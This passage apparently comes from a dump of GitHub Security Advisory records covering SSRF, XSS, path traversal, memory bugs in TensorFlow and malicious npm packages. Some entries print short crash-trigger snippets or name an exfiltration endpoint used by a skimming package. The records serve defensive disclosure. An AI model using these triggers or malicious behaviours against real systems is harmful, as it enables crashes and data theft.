No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees. | {'CVE-2016-10680'} | 2021-01-14T15:57:09Z | 2020-09-01T16:10:03Z | MODERATE | 0 | {'CWE-311'} | {'https://github.com/advisories/GHSA-h2jv-5v3f-7m7j', 'https://nodesecurity.io/advisories/283', 'https://www.npmjs.com/advisories/283', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10680'} | null |
GHSA | GHSA-5hjh-c26m-xw8w | ProxyScotch is vulnerable to a server-side Request Forgery (SSRF) | ProxyScotch is a simple proxy server created for hoppscotch.io. The package github.com/hoppscotch/proxyscotch before 1.0.0 are vulnerable to Server-side Request Forgery (SSRF) when interceptor mode is set to proxy. It occurs when an HTTP request is made by a backend server to an untrusted URL submitted by a user. It leads to a leakage of sensitive information from the server. | {'CVE-2022-25850'} | 2022-05-04T20:14:03Z | 2022-05-03T00:00:44Z | HIGH | 7.5 | {'CWE-918'} | {'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMHOPPSCOTCHPROXYSCOTCH-2435228', 'https://nvd.nist.gov/vuln/detail/CVE-2022-25850', 'https://github.com/advisories/GHSA-5hjh-c26m-xw8w', 'https://github.com/hoppscotch/proxyscotch/commit/de67380f62f907f201d75854b76024ba4885fab7'} | null |
GHSA | GHSA-59g9-7gfx-c72p | Infinite loop in Tomcat due to parsing error | Apache Tomcat 8.5.0 to 8.5.63, 9.0.0-M1 to 9.0.43 and 10.0.0-M1 to 10.0.2 did not properly validate incoming TLS packets. When Tomcat was configured to use NIO+OpenSSL or NIO2+OpenSSL for TLS, a specially crafted packet could be used to trigger an infinite loop resulting in a denial of service. | {'CVE-2021-41079'} | 2021-10-18T18:40:16Z | 2021-09-20T20:45:44Z | HIGH | 7.5 | {'CWE-20'} | {'https://lists.apache.org/thread.html/r6b6b674e3f168dd010e67dbe6848b866e2acf26371452fdae313b98a@%3Cusers.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/rccdef0349fdf4fb73a4e4403095446d7fe6264e0a58e2df5c6799434%40%3Cannounce.tomcat.apache.org%3E', 'https://github.com/advisories/GHSA-59g9-7gfx-c72p', 'https://security.netapp.com/advisory/ntap-20211008-0005/', 'https://www.debian.org/security/2021/dsa-4986', 'https://lists.apache.org/thread.html/rb4de81ac647043541a32881099aa6eb5a23f1b7fd116f713f8ab9dbe@%3Cdev.tomcat.apache.org%3E', 'https://github.com/apache/tomcat/commit/34115fb3c83f6cd97772232316a492a4cc5729e0', 'https://lists.debian.org/debian-lts-announce/2021/09/msg00012.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41079'} | null |
GHSA | GHSA-j739-gw6q-f4c7 | HTML Injection in Froxlor | Froxlor through 0.10.22 does not perform validation on user input passed in the customermail GET parameter. The value of this parameter is reflected in the login webpage, allowing the injection of arbitrary HTML tags.
Note: Froxlor version 0.10.22 introduces AntiXSS cross-site scripting protection, but AntiXSS only provides partial protection for this particular issue. | {'CVE-2020-29653'} | 2022-04-22T20:41:49Z | 2022-04-14T00:00:19Z | MODERATE | 6.1 | {'CWE-79'} | {'https://github.com/advisories/GHSA-j739-gw6q-f4c7', 'https://nvd.nist.gov/vuln/detail/CVE-2020-29653', 'https://github.com/Froxlor/Froxlor/commit/6bf5eccc2477257b6c1760a3c3784ae7e0554ce0', 'https://github.com/Froxlor/Froxlor/security/advisories', 'https://nozero.io/en/cve-2020-29653-froxlor-html-injection-dangling-markup/'} | null |
GHSA | GHSA-m7w4-8wp8-m2xq | Data races in beef | An issue was discovered in the beef crate before 0.5.0 for Rust.
Affected versions of this crate did not have a `T: Sync` bound in the `Send` impl for `Cow<'_, T, U>`. This allows users to create data races by making `Cow` contain types that are (Send && !Sync) like `Cell<_>` or `RefCell<_>`.
Such data races can lead to memory corruption.
The flaw was corrected in commit d1c7658 by adding trait bounds `T: Sync` and `T::Owned: Send` to the `Send` impl for `Cow<'_, T, U>`.
| {'CVE-2020-36442'} | 2021-08-25T20:59:08Z | 2021-08-25T20:59:08Z | HIGH | 8.1 | {'CWE-119', 'CWE-362'} | {'https://rustsec.org/advisories/RUSTSEC-2020-0122.html', 'https://github.com/advisories/GHSA-m7w4-8wp8-m2xq', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36442', 'https://github.com/maciejhirsz/beef/issues/37'} | null |
GHSA | GHSA-q799-q27x-vp7w | Out-of-bounds Write in OpenCV | An exploitable heap buffer overflow vulnerability exists in the data structure persistence functionality of OpenCV, version 4.1.0 (corresponds with OpenCV-Python version 4.1.2.30). A specially crafted JSON file can cause a buffer overflow, resulting in multiple heap corruptions and potentially code execution. An attacker can provide a specially crafted file to trigger this vulnerability. | {'CVE-2019-5064'} | 2022-04-20T19:14:26Z | 2021-10-12T22:23:21Z | HIGH | 8.8 | {'CWE-787', 'CWE-120'} | {'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://github.com/opencv/opencv/releases/tag/4.2.0', 'https://github.com/opencv/opencv-python/releases/tag/32', 'https://github.com/opencv/opencv/issues/15857', 'https://github.com/advisories/GHSA-q799-q27x-vp7w', 'https://nvd.nist.gov/vuln/detail/CVE-2019-5064', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://talosintelligence.com/vulnerability_reports/TALOS-2019-0853'} | null |
GHSA | GHSA-42j4-733x-5vcf | Regular expression denial of service (ReDoS) in EmailValidator class in Vaadin 7 | Unsafe validation RegEx in `EmailValidator` class in `com.vaadin:vaadin-server` versions 7.0.0 through 7.7.21 (Vaadin 7.0.0 through 7.7.21) allows attackers to cause uncontrolled resource consumption by submitting malicious email addresses.
- https://vaadin.com/security/cve-2020-36320 | {'CVE-2020-36320'} | 2021-04-26T19:29:49Z | 2021-04-19T14:49:32Z | HIGH | 7.5 | {'CWE-400'} | {'https://github.com/vaadin/framework/issues/7757', 'https://github.com/advisories/GHSA-42j4-733x-5vcf', 'https://github.com/vaadin/framework/pull/12104', 'https://github.com/vaadin/framework/security/advisories/GHSA-42j4-733x-5vcf', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36320', 'https://vaadin.com/security/cve-2020-36320'} | null |
GHSA | GHSA-4g7x-7vgq-3j28 | Vulnerability in list function leads to arbitrary code execution via filePath parameters | aaptjs is a node wraper for aapt. An issue was discovered in the list function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters. | {'CVE-2020-36376'} | 2022-05-05T13:40:54Z | 2021-11-02T15:42:16Z | CRITICAL | 9.8 | {'CWE-77', 'CWE-78'} | {'https://github.com/advisories/GHSA-4g7x-7vgq-3j28', 'https://github.com/shenzhim/aaptjs/issues/2', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36376'} | null |
GHSA | GHSA-gr4j-r575-g665 | Cross-Site Scripting in highcharts | Versions of `highcharts` prior to 7.2.2 or 8.1.1 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize `href` values and does not restrict URL schemes, allowing attackers to execute arbitrary JavaScript in a victim's browser if they click the link. | null | 2021-09-23T19:06:36Z | 2020-08-25T14:04:47Z | HIGH | 8.7 | {'CWE-79'} | {'https://www.npmjs.com/advisories/1227', 'https://github.com/advisories/GHSA-gr4j-r575-g665', 'https://github.com/highcharts/highcharts/issues/13559', 'https://snyk.io/vuln/SNYK-JS-HIGHCHARTS-571995'} | null |
GHSA | GHSA-p5pg-wm9q-8v6r | Improper Handling of Exceptional Conditions inn metadata-extractor | metadata-extractor up to 2.16.0 can throw various uncaught exceptions while parsing a specially crafted JPEG file, which could result in an application crash. This could be used to mount a denial of service attack against services that use metadata-extractor library. | {'CVE-2022-24613'} | 2022-03-08T21:10:19Z | 2022-02-25T00:01:05Z | MODERATE | 5.5 | {'CWE-755'} | {'https://nvd.nist.gov/vuln/detail/CVE-2022-24613', 'https://github.com/drewnoakes/metadata-extractor/issues/561', 'https://github.com/advisories/GHSA-p5pg-wm9q-8v6r'} | null |
GHSA | GHSA-fvqr-27wr-82fm | Prototype Pollution in lodash | Versions of `lodash` before 4.17.5 are vulnerable to prototype pollution.
The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of `Object` via `__proto__` causing the addition or modification of an existing property that will exist on all objects.
## Recommendation
Update to version 4.17.5 or later. | {'CVE-2018-3721'} | 2021-01-08T18:51:08Z | 2018-07-26T15:14:52Z | LOW | 0 | {'CWE-471'} | {'https://nvd.nist.gov/vuln/detail/CVE-2018-3721', 'https://www.npmjs.com/advisories/577', 'https://github.com/lodash/lodash/commit/d8e069cc3410082e44eb18fcf8e7f3d08ebe1d4a', 'https://security.netapp.com/advisory/ntap-20190919-0004/', 'https://hackerone.com/reports/310443', 'https://github.com/advisories/GHSA-fvqr-27wr-82fm'} | null |
GHSA | GHSA-8mm3-2mcj-cx6r | Malicious Package in angluar-cli | Version 0.0.3 of `angluar-cli` contains malicious code as a postinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed the package attempts to remove files and stop processes related to McAfee antivirus on macOS.
## Recommendation
Remove the package from your environment and verify whether files were deleted and if processes were stopped. | null | 2021-09-30T21:58:44Z | 2020-09-11T21:09:24Z | CRITICAL | 9.8 | {'CWE-506'} | {'https://www.npmjs.com/advisories/918', 'https://github.com/advisories/GHSA-8mm3-2mcj-cx6r'} | null |
GHSA | GHSA-cq9c-55r7-455x | Moderate severity vulnerability that affects org.apache.karaf:apache-karaf | In Apache Karaf version prior to 3.0.9, 4.0.9, 4.1.1, when the webconsole feature is installed in Karaf, it is available at .../system/console and requires authentication to access it. One part of the console is a Gogo shell/console that gives access to the command line console of Karaf via a Web browser, and when navigated to it is available at .../system/console/gogo. Trying to go directly to that URL does require authentication. And optional bundle that some applications use is the Pax Web Extender Whiteboard, it is part of the pax-war feature and perhaps others. When it is installed, the Gogo console becomes available at another URL .../gogo/, and that URL is not secured giving access to the Karaf console to unauthenticated users. A mitigation for the issue is to manually stop/uninstall Gogo plugin bundle that is installed with the webconsole feature, although of course this removes the console from the .../system/console application, not only from the unauthenticated endpoint. One could also stop/uninstall the Pax Web Extender Whiteboard, but other components/applications may require it and so their functionality would be reduced/compromised. | {'CVE-2018-11787'} | 2021-09-09T20:21:44Z | 2019-01-07T19:14:51Z | HIGH | 8.1 | {'CWE-287'} | {'https://issues.apache.org/jira/browse/KARAF-4993', 'https://github.com/advisories/GHSA-cq9c-55r7-455x', 'https://nvd.nist.gov/vuln/detail/CVE-2018-11787', 'http://karaf.apache.org/security/cve-2018-11787.txt', 'https://lists.apache.org/thread.html/d9ba4c3104ba32225646879a057b75b54430f349c246c85469037d3c@%3Cdev.karaf.apache.org%3E'} | null |
GHSA | GHSA-fvpg-qx3g-7mp7 | High severity vulnerability that affects Microsoft.ChakraCore | A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0609, CVE-2019-0639, CVE-2019-0680, CVE-2019-0769, CVE-2019-0770, CVE-2019-0773, CVE-2019-0783. | {'CVE-2019-0771'} | 2021-09-10T19:58:27Z | 2019-04-09T19:43:29Z | HIGH | 7.5 | {'CWE-787'} | {'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0771', 'https://github.com/advisories/GHSA-fvpg-qx3g-7mp7', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0771'} | null |
GHSA | GHSA-hjhp-hwfj-hwf3 | Cross Site Request Forgery in firefly-iii | firefly-iii is vulnerable to a Cross-Site Request Forgery (CSRF) attack which can disable two factor authentication for the target user. | {'CVE-2021-4005'} | 2021-12-10T20:20:08Z | 2021-12-10T20:20:08Z | MODERATE | 4.3 | {'CWE-352'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-4005', 'https://github.com/firefly-iii/firefly-iii/commit/03a1601bf343181df9f405dd2109aec483cb7053', 'https://github.com/advisories/GHSA-hjhp-hwfj-hwf3', 'https://huntr.dev/bounties/bf4ef581-325a-492d-a710-14fcb53f00ff'} | null |
GHSA | GHSA-hq3v-rg6f-6hx4 | Use of Insufficiently Random Values in yiisoft/yii2-dev | yii2 is vulnerable to Use of Predictable Algorithm in Random Number Generator | {'CVE-2021-3689'} | 2021-09-01T18:35:34Z | 2021-09-01T18:35:34Z | HIGH | 7.5 | {'CWE-330'} | {'https://huntr.dev/bounties/50aad1d4-eb00-4573-b8a4-dbe38e2c229f', 'https://github.com/yiisoft/yii2/commit/13f27e4d920a05d53236139e8b07007acd046a46', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3689', 'https://github.com/advisories/GHSA-hq3v-rg6f-6hx4'} | null |
GHSA | GHSA-j5jc-jf8f-86q7 | Malicious Package in dictum.js | Version 1.0.5 of `dictum.js` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
## Recommendation
If version 1.0.5 of this module is found installed you will want to replace it with a version before or after 1.0.5. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised. | null | 2020-09-01T20:38:30Z | 2020-09-01T20:38:30Z | CRITICAL | 0 | null | {'https://github.com/advisories/GHSA-j5jc-jf8f-86q7', 'https://www.npmjs.com/advisories/640'} | null |
GHSA | GHSA-3x4c-pq33-4w3q | Improper authorisation of members discloses room membership to non-members | ### Impact
Unauthorised users can access the membership (list of members, with their display names) of a room if they know the ID of the room. The vulnerability is limited to rooms with `shared` history visibility. Furthermore, the unauthorised user must be using an account on a vulnerable homeserver that is in the room.
### Patches
Server administrators should upgrade to 1.41.1 or later.
### Workarounds
Administrators of servers that use a reverse proxy could, with potentially unacceptable loss of functionality, block the following endpoints:
* `/_matrix/client/r0/rooms/{room_id}/members` with `at` query parameter
* `/_matrix/client/unstable/rooms/{room_id}/members` with `at` query parameter
### References
n/a
### For more information
If you have any questions or comments about this advisory, e-mail us at security@matrix.org. | {'CVE-2021-39164'} | 2022-04-19T19:03:11Z | 2021-09-01T18:25:27Z | LOW | 3.1 | {'CWE-200'} | {'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PXT7ID7DNBRN2TVTETU3SYQHJKEG6PXN/', 'https://github.com/matrix-org/synapse/commit/cb35df940a', 'https://nvd.nist.gov/vuln/detail/CVE-2021-39164', 'https://github.com/matrix-org/synapse/security/advisories/GHSA-3x4c-pq33-4w3q', 'https://github.com/advisories/GHSA-3x4c-pq33-4w3q', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2VHDEPCZ22GJFMZCWA2XZAGPOEV72POF/', 'https://github.com/matrix-org/synapse/releases/tag/v1.41.1'} | null |
GHSA | GHSA-mh37-8c3g-3fgc | Escape sequence injection in RubyGems | An issue was discovered in RubyGems 2.6 and later through 3.0.2. The gem owner command outputs the contents of the API response directly to stdout. Therefore, if the response is crafted, escape sequence injection may occur. | {'CVE-2019-8322'} | 2020-08-17T19:24:01Z | 2019-06-20T16:06:00Z | HIGH | 0 | null | {'https://lists.debian.org/debian-lts-announce/2020/08/msg00027.html', 'https://nvd.nist.gov/vuln/detail/CVE-2019-8322', 'http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html', 'https://hackerone.com/reports/315087', 'https://github.com/advisories/GHSA-mh37-8c3g-3fgc'} | null |
GHSA | GHSA-6xhg-q9c8-rj32 | Credential leak in react-native-fast-image | This affects all versions before version 8.3.0 of package react-native-fast-image. When an image with source={{uri: "...", headers: { host: "somehost.com", authorization: "..." }} is loaded, all other subsequent images will use the same headers, this can lead to signing credentials or other session tokens being leaked to other servers. | {'CVE-2020-7696'} | 2021-05-18T01:52:54Z | 2021-05-18T01:52:54Z | MODERATE | 5.3 | {'CWE-200'} | {'https://snyk.io/vuln/SNYK-JS-REACTNATIVEFASTIMAGE-572228', 'https://github.com/DylanVann/react-native-fast-image/pull/691', 'https://github.com/DylanVann/react-native-fast-image/commit/4a7cd64f5b0aa40b04d63ccb105ee2b511abe624', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7696', 'https://github.com/advisories/GHSA-6xhg-q9c8-rj32', 'https://github.com/DylanVann/react-native-fast-image/issues/690'} | null |
GHSA | GHSA-mqh2-9wrp-vx84 | Heap buffer overflow in `SparseSplit` | ### Impact
An attacker can cause a heap buffer overflow in `tf.raw_ops.SparseSplit`:
```python
import tensorflow as tf
shape_dims = tf.constant(0, dtype=tf.int64)
indices = tf.ones([1, 1], dtype=tf.int64)
values = tf.ones([1], dtype=tf.int64)
shape = tf.ones([1], dtype=tf.int64)
tf.raw_ops.SparseSplit(
split_dim=shape_dims, indices=indices, values=values,
shape=shape, num_split=1)
```
This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/699bff5d961f0abfde8fa3f876e6d241681fbef8/tensorflow/core/util/sparse/sparse_tensor.h#L528-L530) accesses an array element based on a user controlled offset:
```cc
const int dim = input_tensor.indices().matrix<int64>()(i, split_dim);
int slice_index = GetSliceIndex(dim, split_size, residual);
num_values[slice_index]++;
```
This results in overriding values on the heap.
### Patches
We have patched the issue in GitHub commit [8ba6fa29cd8bf9cef9b718dc31c78c73081f5b31](https://github.com/tensorflow/tensorflow/commit/8ba6fa29cd8bf9cef9b718dc31c78c73081f5b31).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team. | {'CVE-2021-29558'} | 2021-05-21T14:24:51Z | 2021-05-21T14:24:51Z | LOW | 2.5 | {'CWE-787'} | {'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-mqh2-9wrp-vx84', 'https://github.com/tensorflow/tensorflow/commit/8ba6fa29cd8bf9cef9b718dc31c78c73081f5b31', 'https://github.com/advisories/GHSA-mqh2-9wrp-vx84', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29558'} | null |
GHSA | GHSA-98p5-x8x4-c9m5 | Integer overflow in TFLite | ### Impact
An attacker can craft a TFLite model that would cause an integer overflow [in embedding lookup operations](https://github.com/tensorflow/tensorflow/blob/ca6f96b62ad84207fbec580404eaa7dd7403a550/tensorflow/lite/kernels/embedding_lookup_sparse.cc#L179-L189):
```cc
int embedding_size = 1;
int lookup_size = 1;
for (int i = 0; i < lookup_rank - 1; i++, k++) {
const int dim = dense_shape->data.i32[i];
lookup_size *= dim;
output_shape->data[k] = dim;
}
for (int i = 1; i < embedding_rank; i++, k++) {
const int dim = SizeOfDimension(value, i);
embedding_size *= dim;
output_shape->data[k] = dim;
}
```
Both `embedding_size` and `lookup_size` are products of values provided by the user. Hence, a malicious user could trigger overflows in the multiplication.
In certain scenarios, this can then result in heap OOB read/write.
### Patches
We have patched the issue in GitHub commits [f19be71717c497723ba0cea0379e84f061a75e01](https://github.com/tensorflow/tensorflow/commit/f19be71717c497723ba0cea0379e84f061a75e01), [1de49725a5fc4e48f1a3b902ec3599ee99283043](https://github.com/tensorflow/tensorflow/commit/1de49725a5fc4e48f1a3b902ec3599ee99283043) and [a4e401da71458d253b05e41f28637b65baf64be4](https://github.com/tensorflow/tensorflow/commit/a4e401da71458d253b05e41f28637b65baf64be4).
The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by Wang Xuan of Qihoo 360 AIVul Team. | {'CVE-2022-23559'} | 2022-02-11T15:08:16Z | 2022-02-09T23:52:51Z | HIGH | 8.8 | {'CWE-190'} | {'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-98p5-x8x4-c9m5', 'https://github.com/advisories/GHSA-98p5-x8x4-c9m5', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23559', 'https://github.com/tensorflow/tensorflow/commit/a4e401da71458d253b05e41f28637b65baf64be4', 'https://github.com/tensorflow/tensorflow/commit/1de49725a5fc4e48f1a3b902ec3599ee99283043', 'https://github.com/tensorflow/tensorflow/commit/f19be71717c497723ba0cea0379e84f061a75e01', 'https://github.com/tensorflow/tensorflow/blob/ca6f96b62ad84207fbec580404eaa7dd7403a550/tensorflow/lite/kernels/embedding_lookup_sparse.cc#L179-L189'} | null |
GHSA | GHSA-jwhv-rgqc-fqj5 | Moderate severity vulnerability that affects rails | Session fixation vulnerability in Rails before 1.2.4, as used for Ruby on Rails, allows remote attackers to hijack web sessions via unspecified vectors related to "URL-based sessions." | {'CVE-2007-5380'} | 2021-09-14T19:52:33Z | 2017-10-24T18:33:38Z | MODERATE | 0 | {'CWE-384'} | {'http://bugs.gentoo.org/show_bug.cgi?id=195315', 'http://secunia.com/advisories/28136', 'https://nvd.nist.gov/vuln/detail/CVE-2007-5380', 'http://www.novell.com/linux/security/advisories/2007_25_sr.html', 'http://docs.info.apple.com/article.html?artnum=307179', 'http://weblog.rubyonrails.org/2007/10/5/rails-1-2-4-maintenance-release', 'http://security.gentoo.org/glsa/glsa-200711-17.xml', 'http://www.vupen.com/english/advisories/2007/3508', 'http://secunia.com/advisories/27657', 'http://secunia.com/advisories/27965', 'http://www.vupen.com/english/advisories/2007/4238', 'http://lists.apple.com/archives/security-announce/2007/Dec/msg00002.html', 'http://www.us-cert.gov/cas/techalerts/TA07-352A.html', 'https://github.com/advisories/GHSA-jwhv-rgqc-fqj5', 'http://www.securityfocus.com/bid/26096'} | null |
GHSA | GHSA-8w3x-r6x7-c5r5 | Cross-site Scripting in pimcore | pimcore is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') | {'CVE-2021-4084'} | 2021-12-16T14:28:27Z | 2021-12-16T14:28:27Z | MODERATE | 6.1 | {'CWE-79'} | {'https://github.com/pimcore/pimcore/commit/3c2a14e676a57e5d77a16255965988eef48f9065', 'https://nvd.nist.gov/vuln/detail/CVE-2021-4084', 'https://github.com/advisories/GHSA-8w3x-r6x7-c5r5', 'https://huntr.dev/bounties/dcb37f19-ba53-4498-b953-d21999279266'} | null |
GHSA | GHSA-g4h2-gqm3-c9wq | Segfault in tf.raw_ops.ImmutableConst | ### Impact
Calling [`tf.raw_ops.ImmutableConst`](https://www.tensorflow.org/api_docs/python/tf/raw_ops/ImmutableConst) with a `dtype` of `tf.resource` or `tf.variant` results in a segfault in the implementation as code assumes that the tensor contents are pure scalars.
```python
>>> import tensorflow as tf
>>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt")
...
Segmentation fault
```
### Patches
We have patched the issue in 4f663d4b8f0bec1b48da6fa091a7d29609980fa4 and will release TensorFlow 2.5.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.
### Workarounds
If using `tf.raw_ops.ImmutableConst` in code, you can prevent the segfault by inserting a filter for the `dtype` argument.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. | {'CVE-2021-29539'} | 2021-05-21T14:23:05Z | 2021-05-21T14:23:05Z | LOW | 2.5 | {'CWE-681'} | {'https://github.com/advisories/GHSA-g4h2-gqm3-c9wq', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-g4h2-gqm3-c9wq', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29539', 'https://github.com/tensorflow/tensorflow/commit/4f663d4b8f0bec1b48da6fa091a7d29609980fa4'} | null |
GHSA | GHSA-9h4g-27m8-qjrg | Path Traversal in socket.io-file | All versions of `socket.io-file` are vulnerable to Path Traversal. The package fails to sanitize user input and uses it to generate the file upload paths. The `socket.io-file::createFile` message contains a `name` option that is passed directly to `path.join()`. It is possible to upload files to arbitrary folders on the server by sending relative paths on the `name` value, such as `../../test.js`. The `uploadDir` and `rename` options can be used to define the file upload path. | {'CVE-2020-15779'} | 2021-09-22T20:28:29Z | 2020-07-07T19:24:47Z | HIGH | 7.5 | {'CWE-22'} | {'https://www.npmjs.com/advisories/1519', 'https://github.com/advisories/GHSA-9h4g-27m8-qjrg', 'https://github.com/rico345100/socket.io-file', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15779', 'https://www.npmjs.com/package/socket.io-file'} | null |
GHSA | GHSA-729f-wvj3-c4pj | Remote code execution in UReport | An arbitrary file creation vulnerability in UReport 2.2.9 allows attackers to execute arbitrary code. | {'CVE-2020-21125'} | 2021-09-20T20:45:03Z | 2021-09-20T20:45:03Z | HIGH | 0 | {'CWE-22'} | {'https://nvd.nist.gov/vuln/detail/CVE-2020-21125', 'https://github.com/advisories/GHSA-729f-wvj3-c4pj', 'https://github.com/youseries/ureport/issues/485'} | null |
GHSA | GHSA-33gc-f8v9-v8hm | Malicious Package in ladder-text-js | `ladder-text-js` contained a malicious script that attempted to delete all files when `npm test` was run.
## Recommendation
This module has been unpublished from the npm Registry. If you find this module in your environment remove it. | null | 2021-10-01T13:27:37Z | 2020-09-01T20:41:40Z | CRITICAL | 9.8 | {'CWE-506'} | {'https://github.com/advisories/GHSA-33gc-f8v9-v8hm', 'https://www.npmjs.com/advisories/651'} | null |
GHSA | GHSA-pgcp-m69h-p2gr | Cross-site Scripting (XSS) in moodle | In Moodle, it was possible to include JavaScript when re-naming content bank items. Versions affected: 3.9 to 3.9.2. This is fixed in moodle 3.9.3 and 3.10. | {'CVE-2020-25702'} | 2021-03-29T20:43:08Z | 2021-03-29T20:43:08Z | MODERATE | 6.1 | {'CWE-79'} | {'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4NNFCHPPHRJNJROIX6SYMHOC6HMKP3GU/', 'https://github.com/moodle/moodle/commit/66be08216e647532b295a9132070d2435ecd7ad9', 'https://bugzilla.redhat.com/show_bug.cgi?id=1895437', 'https://moodle.org/mod/forum/discuss.php?d=413940', 'https://nvd.nist.gov/vuln/detail/CVE-2020-25702', 'https://github.com/advisories/GHSA-pgcp-m69h-p2gr', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B55KXBVAT45MDASJ3EK6VIGQOYGJ4NH6/'} | null |
GHSA | GHSA-mv78-g7wq-mhp4 | Division by zero in padding computation in TFLite | ### Impact
The TFLite computation for size of output after padding, [`ComputeOutSize`](https://github.com/tensorflow/tensorflow/blob/0c9692ae7b1671c983569e5d3de5565843d500cf/tensorflow/lite/kernels/padding.h#L43-L55), does not check that the `stride` argument is not 0 before doing the division.
```cc
inline int ComputeOutSize(TfLitePadding padding, int image_size,
int filter_size, int stride, int dilation_rate = 1) {
int effective_filter_size = (filter_size - 1) * dilation_rate + 1;
switch (padding) {
case kTfLitePaddingSame:
return (image_size + stride - 1) / stride;
case kTfLitePaddingValid:
return (image_size + stride - effective_filter_size) / stride;
default:
return 0;
}
}
```
Users can craft special models such that `ComputeOutSize` is called with `stride` set to 0.
### Patches
We have patched the issue in GitHub commit [49847ae69a4e1a97ae7f2db5e217c77721e37948](https://github.com/tensorflow/tensorflow/commit/49847ae69a4e1a97ae7f2db5e217c77721e37948).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360. | {'CVE-2021-29585'} | 2021-05-21T14:26:41Z | 2021-05-21T14:26:41Z | LOW | 2.5 | {'CWE-369'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-29585', 'https://github.com/tensorflow/tensorflow/commit/49847ae69a4e1a97ae7f2db5e217c77721e37948', 'https://github.com/advisories/GHSA-mv78-g7wq-mhp4', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-mv78-g7wq-mhp4'} | null |
GHSA | GHSA-vr98-27qj-3c8q | Directory traversal in rollup-plugin-server | This affects all versions of package rollup-plugin-dev-server. There is no path sanitization in readFile operation inside the readFileFromContentBase function. | {'CVE-2020-7686'} | 2021-09-23T17:34:46Z | 2020-07-29T18:07:35Z | HIGH | 7.5 | {'CWE-22'} | {'https://snyk.io/vuln/SNYK-JS-ROLLUPPLUGINDEVSERVER-590124', 'https://github.com/advisories/GHSA-vr98-27qj-3c8q', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7686'} | null |
GHSA | GHSA-h58v-c6rf-g9f7 | Cross site scripting in the system log | ### Impact
It is possible to inject code into the `tl_log` table that will be executed in the browser when the system log is called in the back end.
### Patches
Update to Contao 4.9.16 or 4.11.5.
### Workarounds
Disable the system log module in the back end for all users (especially admin users).
### References
https://contao.org/en/security-advisories/cross-site-scripting-in-the-system-log-2021.html
### For more information
If you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).
